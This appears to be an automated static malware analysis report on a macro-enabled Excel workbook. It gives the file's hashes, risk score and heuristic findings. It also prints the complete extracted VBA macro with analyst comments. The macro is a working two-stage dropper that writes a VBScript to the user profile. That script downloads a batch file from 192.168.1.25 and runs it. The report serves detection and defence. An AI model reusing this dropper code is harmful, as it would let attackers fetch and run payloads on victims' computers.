Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cde3d5a5ac8469e4…

MALICIOUS

Office (OOXML)

21.5 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-03-01
MD5: 497d048dd4b1d118beab357dbd8cd8df SHA-1: 5782e0b9105345046ebfd7b5501b8f4c68f26d93 SHA-256: cde3d5a5ac8469e42f75c67d017dc5e277fe943aca9cb156c979711e1d91df1e
242 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell Replace("wscript ""FILE"" ", "FILE", myFile)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) referenced each URL.
    URL http://192.168.1.25/main/toto.bat Referenced by macro

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2866 bytes
SHA-256: ff51d3c8685547d284d01cc21f3e02afb97b123bb0b1c02da507cddd71c93d8f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Feuil1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
' Analyst annotation: click handler for CommandButton1 on the "Feuil1" sheet module.
' Two-stage dropper. Stage 1 (this macro) writes a VBScript downloader to
' %UserProfile%\toto.vbs and launches it with wscript.exe. Stage 2 (the dropped
' .vbs) fetches http://192.168.1.25/main/toto.bat with WinHTTP and runs it.
' Execution needs a user click on the button; no Auto_Open / Workbook_Open
' trigger is visible in the extracted modules.
' Host/network indicators derived from this code: creation of %UserProfile%\toto.vbs
' and %UserProfile%\toto.bat, EXCEL.EXE spawning wscript.exe, an HTTP GET to
' 192.168.1.25 (a private-range address, which suggests a lab or test build — confirm).
' oShell, userProfilePath and myFile are never declared; no Option Explicit is visible.
Private Sub CommandButton1_Click()
    Dim myoutputfile As Integer
    Dim FilePath As String   ' declared but never used
    Set oShell = CreateObject("WScript.Shell")   ' WScript.Shell COM object (OLE_VBA_WSCRIPT / OLE_VBA_CREATEOBJ findings)
    userProfilePath = oShell.ExpandEnvironmentStrings("%UserProfile%")   ' resolves the drop folder
    
    myFile = userProfilePath + "\toto.vbs"   ' stage-2 drop path
    myoutputfile = FreeFile
    Open myFile For Output As #myoutputfile   ' creates/truncates %UserProfile%\toto.vbs
    ' First line of the dropped script: a call to the HTTPDownload Sub written below,
    ' with the hard-coded URL and the user-profile folder as arguments.
    Print #myoutputfile, "HTTPDownload ""http://192.168.1.25/main/toto.bat"", """ & userProfilePath & """"; ""
    ' Everything below is the VBScript body of HTTPDownload, written out verbatim.
    Print #myoutputfile, "Sub HTTPDownload( myURL, myPath )"
    Print #myoutputfile, "     Dim i, objFile, objFSO, objHTTP, strFile, strMsg"
    Print #myoutputfile, "     Const ForReading = 1, ForWriting = 2, ForAppending = 8"
    Print #myoutputfile, "     Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
    ' Target path selection: myPath is the user-profile folder passed above, so the
    ' first branch applies and strFile becomes <profile>\toto.bat (the URL basename).
    Print #myoutputfile, "     If objFSO.FolderExists(myPath) Then"
    Print #myoutputfile, "          strFile = objFSO.BuildPath(myPath, Mid(myURL, InStrRev(myURL, ""/"") + 1))"
    ' The ElseIf searches for " \ " (backslash with surrounding spaces) — looks like a
    ' typo for "\", so this branch is unlikely to match a real path; unreachable here anyway.
    Print #myoutputfile, "     ElseIf objFSO.FolderExists(Left(myPath, InStrRev(myPath, "" \ "") - 1)) Then"
    Print #myoutputfile, "          strFile = myPath"
    Print #myoutputfile, "     Else"
    Print #myoutputfile, "          WScript.Echo ""ERROR: Target folder not found."""
    Print #myoutputfile, "          Exit Sub"
    Print #myoutputfile, "     End If"
    Print #myoutputfile, "     Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
    ' Synchronous HTTP GET via WinHttp.WinHttpRequest.5.1; the response body is copied
    ' to the target file one byte at a time (AscB/MidB) through a text stream.
    Print #myoutputfile, "     Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
    Print #myoutputfile, "     objHTTP.Open ""GET"", myURL, False"
    Print #myoutputfile, "     objHTTP.Send"
    Print #myoutputfile, "     For i = 1 To LenB(objHTTP.ResponseBody)"
    Print #myoutputfile, "          objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
    Print #myoutputfile, "     Next"
    Print #myoutputfile, "     objFile.Close( )"
    ' Stage 3: the downloaded batch file is executed through WScript.Shell.Run with
    ' window style 2 (a minimized window in the Run API); expect wscript.exe -> cmd.exe.
    Print #myoutputfile, "     Set WshShell = WScript.CreateObject(""WScript.Shell"")"
    Print #myoutputfile, "     WshShell.Run ""%UserProfile%\toto.bat"",2 "
   
    Print #myoutputfile, "End Sub"
    Close #myoutputfile
    ' Builds the command line 'wscript "<profile>\toto.vbs" ' via Replace and runs it
    ' with Shell (OLE_VBA_SHELL finding) — this is the EXCEL.EXE -> wscript.exe parent/child.
    Shell Replace("wscript ""FILE"" ", "FILE", myFile)
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24576 bytes
SHA-256: 504d4e7d1a9cfc6064c23c1384f81f87bdf93b0c5d23d358bb0e506a488bb42e
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2672 bytes
SHA-256: 9059f8e1dbc03e175023d77f26af1f105919e0ebe79e2dd340152764226f7ca2